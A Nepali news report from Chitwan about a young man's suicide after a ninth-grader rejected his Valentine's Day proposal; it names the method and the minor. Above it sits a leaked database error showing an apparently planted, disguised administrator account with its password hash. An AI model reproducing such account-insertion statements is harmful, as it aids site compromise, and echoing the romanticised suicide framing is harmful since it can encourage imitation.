WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BuJAuetDzQGVM8qtZfUuezM9Y.4aDO0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-12 22:19:59', '', 'admlnlx', 'admlnlx')
सुमित आचार्य
चितवन, फागुन ४–
‘म तिमीलाइ माया गर्छु, तिम्रो लागि ज्यानै दिन्छुू’ भनेर युवाहरुले खाने कसम मात्र भनाइमै सिमित जस्तो लाग्न सक्छ तर प्रेम दिवस (भ्यालेनटाइन डे) को अवसर पारि भरतपुर उपमहानगरपालिका–२ स्थित सुनसरी घर भइ ओम शान्ति चोक बस्ने वर्ष २० का बिकल चौधरीले आफूले मन पराएको युवतीलाई गरेको प्रेम प्रस्ताव अस्विकार गरेको भन्दै तीन तल्ला माथिबाट हाम फालेर आत्महत्या गरेका छन् ।
बिकल बेलुका करीब ५:३० बजेतिर अर्जुन श्रेष्ठको घरमा बिगत महिना देखि डेरामा बस्दै आएकी कक्षा ९ पढ्ने निकिता चौधरीको कोठामा पुगेका थिए । बिकल आफुले धेरै पहिले देखि निकितालाइ प्रेम गर्दै आएको भन्दै उनले निकितासामु प्रेम प्रस्ताव राखेका थिए । जसलार्इ निकिताले ठाडै अस्विकार गरिदिएपछि बिकल त्यसै घरको तीन तल्ला माथिबाट हाम फालेको प्रहरीले जनाएको छ । गम्भीर घाइते भएका बिकललाई तत्कालै अस्पताल लगिएको थियो । चिकित्सकले उनलाइ तत्कालै मृत घोषणा गरेको थियो ।
निकिता र उनको परिवारलाई हिरासतमा लिइ सोधपुछ जारी रहेको जिल्ला प्रहरी कार्यालय चितवनका प्रहरी उपरीक्षक दीपक थापाले नारायणी अनलाईनलाई जानकारी दिनुभयो ।